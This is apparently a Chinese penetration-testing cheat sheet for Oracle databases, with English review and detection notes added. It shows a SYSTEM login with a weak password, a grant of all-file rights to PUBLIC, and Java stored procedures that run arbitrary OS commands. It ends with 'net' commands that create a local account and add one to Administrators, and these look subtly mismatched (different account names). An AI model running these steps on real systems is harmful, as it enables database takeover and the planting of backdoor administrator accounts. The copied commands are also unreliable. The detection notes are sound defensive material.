Oracle

  • 查询SID
-- Reads the instance name from V$INSTANCE; the page uses this value as the SID.
SELECT instance_name
FROM v$instance
  • 查询当前IP（返回的是当前会话客户端的IP地址）
-- Asks the USERENV context for ip_address, i.e. the address of the machine the
-- current session's client connected from (not the database server's own address).
SELECT SYS_CONTEXT('userenv', 'ip_address')
FROM dual
  • sqlplus远程连接
# Remote login as SYSTEM in the user/password@host:port/service form.
# Review note: a password typed on the command line lands in shell history and can
# show up in process listings. A listener reachable from untrusted networks combined
# with a guessable SYSTEM password is the precondition a defender should remove first.
sqlplus system/123456@192.168.3.100:1521/orcl
  • Oracle 提权：通过 Java 存储过程执行系统命令（有回显，需要 sqlplus；按文末参考链接的标题，前提是已具备 DBA 权限）

赋权

-- Java security policy grant. The grantee is PUBLIC, i.e. every database account,
-- and the permission covers all files with read, write, execute and delete actions.
-- Review note: nothing on this page revokes the grant afterwards. Rows for PUBLIC in
-- DBA_JAVA_POLICY are worth auditing, and dbms_java.revoke_permission takes the same
-- four arguments to undo it.
BEGIN
    dbms_java.grant_permission(
        'PUBLIC',
        'SYS:java.io.FilePermission',
        '<<ALL FILES>>',
        'read,write,execute,delete'
    );
END;
/

创建java代码

-- Creates and compiles the Java source object EXE_LINUX, whose class Test exposes list_cmd().
-- list_cmd() hands its argument unchanged to Runtime.exec(), so whoever can call it chooses
-- the program started on the database host.
-- Review note: unexpected JAVA SOURCE / JAVA CLASS rows in DBA_OBJECTS are worth alerting on.
-- Presumably the child process runs under the OS account of the database server process;
-- confirm per platform.
create or replace and compile java source named exe_linux as
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.UnknownHostException;
public class Test
{
// Runs str as an OS command and prints its output; always returns "".
public static String list_cmd(String str){
    Runtime runtime=Runtime.getRuntime();
  // Charset name used to decode the child's output; fixed to GBK.
  StringBuffer enco = new StringBuffer();
  enco.append("GBK");
  try{
  // Starts the program named by str; no validation or allow-list is applied to it.
  Process proc =runtime.exec(str);
  InputStream inp_suc=proc.getInputStream();
  InputStream inp_err=proc.getErrorStream();
  BufferedReader bfr_err = new BufferedReader(new InputStreamReader(inp_err,enco.toString()));
  BufferedReader bfr_suc = new BufferedReader(new InputStreamReader(inp_suc,enco.toString()));
    String strLine;
      // Echo the child's standard output line by line to System.out.
      while( (strLine=(bfr_suc.readLine())) != null){
     
      System.out.println(strLine);
          }
  // Then echo its standard error the same way.
  while( (strLine=(bfr_err.readLine())) != null){
     
    System.out.println(strLine);
    }
        proc.destroy();
        inp_suc.close();
        inp_err.close();
    }catch (Exception e) {
      // Any failure is reported on System.out instead of being rethrown.
      System.out.println("EXECUTE IS ERROR!");
      System.out.println(e.getMessage());
    }
    // The command's output only ever goes to System.out; the return value carries nothing.
    return "";
  }
     
  /* public static void main(String[] args){
     
      list_cmd(args[0]);
    }
    **/
}

/
-- Call specification: publishes Test.list_cmd(java.lang.String) to SQL as procedure
-- P_EXE_LINUX, so its single VARCHAR2 argument is what the Java method receives.
-- Review note: anyone granted EXECUTE on this procedure can reach the Java method.
CREATE OR REPLACE PROCEDURE p_exe_linux (str VARCHAR2)
AS LANGUAGE JAVA
    NAME 'Test.list_cmd(java.lang.String)';
/
-- Show server-side output in this SQL*Plus session.
SET SERVEROUTPUT ON
-- Redirect the Java System.out stream into the DBMS_OUTPUT buffer (the argument is the buffer size).
EXECUTE dbms_java.set_output(1111111111111);
-- Calls the wrapper with 'whoami'. The reply names the OS account the command ran under.
-- Running the database service under a dedicated low-privilege account limits what such a call can reach.
EXECUTE P_EXE_LINUX('whoami');
  • Oracle 提权：通过 Java 存储过程执行系统命令（无回显，需要 sqlplus）
-- Creates the Java source object JAVACMD (the "and resolve" form of the statement).
-- execmd() passes its argument unchanged to Runtime.exec() and keeps no handle on the
-- child process, so the caller sees neither output nor exit status.
-- Review note: unexpected JAVA SOURCE / JAVA CLASS rows in DBA_OBJECTS are worth alerting on.
create or replace and resolve java source named JAVACMD as
    import java.lang.*;
    import java.io.*;
    public class JAVACMD
    {
       // Starts `command` on the database host; the returned Process object is discarded.
       public static void execmd(String command) throws IOException
       {
               Runtime.getRuntime().exec(command);
       }
   }
   /
-- Call specification: exposes JAVACMD.execmd(java.lang.String) to SQL as procedure
-- MYJAVACMD, which takes one input string.
-- Review note: anyone granted EXECUTE on this procedure can reach the Java method.
CREATE OR REPLACE PROCEDURE MYJAVACMD (command IN VARCHAR)
AS LANGUAGE JAVA
    NAME 'JAVACMD.execmd(java.lang.String)';
/
-- Two Windows "net" commands sent through the wrapper: a local account creation and a
-- change to the local Administrators group.
-- Detection: Windows Security events 4720 (user account created) and 4732 (member added
-- to a security-enabled local group), plus net.exe appearing as a child of the Oracle
-- service process.
EXECUTE MYJAVACMD('net user ASP.NET Admin12345 /add');
EXECUTE MYJAVACMD('net localgroup administrators Admin12345 /add');
https://loong716.top/posts/Oracle_Database_Security/	渗透过程中Oracle数据库的利用
https://www.helloworld.net/p/5623921467					Oracle数据库提权(dba权限执行系统命令)